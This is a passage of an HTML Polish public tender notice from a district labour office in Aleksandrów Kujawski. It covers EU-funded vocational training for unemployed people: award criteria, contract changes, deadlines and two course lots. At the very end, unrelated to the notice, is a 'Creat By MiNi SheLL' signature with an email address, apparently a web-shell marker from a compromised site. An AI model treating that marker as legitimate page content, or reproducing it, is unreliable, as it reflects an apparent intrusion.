<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 10</li>
<li>3 - Doświadczenie Wykonawcy w zakresie organizacji szkoleń obejmujących przedmiot zamówienia - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 Zamawiający zastrzega sobie możliwość zmiany umowy w zakresie liczby osób skierowanych na szkolenie ( w takim przypadku Zamawiający dokona zapłaty za liczbę osób faktycznie przeszkolonych), przesunięcia terminu realizacji szkolenia, uzasadnioną zmianę miejsca organizacji szkolenia, dokonanie zmiany wykładowcy po podpisaniu umowy, pod warunkiem, że nowo wskazany wykładowca będzie posiadał wykształcenie i doświadczenie w zakresie ilości przeprowadzonych szkoleń z zakresu objętego zamówieniem równoważne do zmienianego wykładowcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-aleksandrowkujawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
w Aleksandrowie Kujawskim ul. Przemysłowa 1 87 - 700 Aleksandrów Kujawski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2014 godzina 11:00, miejsce: Powiatowy Urząd Pracy w Aleksandrowie Kujawskim ul. Przemysłowa 1 87 - 700 Aleksandrów Kujawski pokój 23 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt W drodze po sukces, PO Kapitał Ludzki, Działanie 6.1, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych, współfinansowanego 
z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> szkolenie: Termomodernizacja budynków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Szkolenie powinno odbywać się w miejscowości Aleksandrów Kujawski.
2) Zajęcia praktyczne zostaną przeprowadzone w obiekcie użyteczności publicznej, zlokalizowanym na terenie Aleksandrowa Kujawskiego. Dokładne miejsce odbywania zajęć praktycznych Zamawiający wskaże przed podpisaniem umowy.
3) Szkoleniem objętych będzie 14 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy 
w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków projektu 
W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego. Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 200 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach 
w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 10</li>
<li>3. Doświadczenie Wykonawcy w zakresie organizacji szkoleń obejmujących przedmiot zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> szkolenie: Pracownik budowlany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Część teoretyczna szkolenia powinna odbywać się w miejscowości Aleksandrów Kujawski. Część praktyczna szkolenia powinna zostać zrealizowana na terenie powiatu aleksandrowskiego, z zastrzeżeniem, iż w przypadku przeprowadzenia szkolenia praktycznego poza miastem Aleksandrów Kujawski, Wykonawca zobowiązuje się zapewnić transport uczestnikom szkolenia z Aleksandrowa Kujawskiego do miejsca odbywania zajęć i z powrotem. Koszt dowozu musi zostać wliczony w cenę szkolenia od osoby i wykazany w odrębnej pozycji w preliminarzu kosztów (zał. nr 7 do SIWZ).
2) Zajęcia praktyczne muszą zostać przeprowadzone u pracodawców, którzy zapewnią odpowiednie zaplecze, nadzór, warunki i materiały do przeprowadzenia zajęć praktycznych.
3) Szkoleniem objętych będzie 6 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie, w ramach środków projektu W DRODZE PO SUKCES Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego. Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 140 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach 
w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia, łącznie z czasem przeznaczonym na przerwy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja w zakresie przedmiotowego szkolenia, ISO, itp.) - 10</li>
<li>3. Doświadczenie Wykonawcy w zakresie organizacji szkoleń obejmujących przedmiot zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com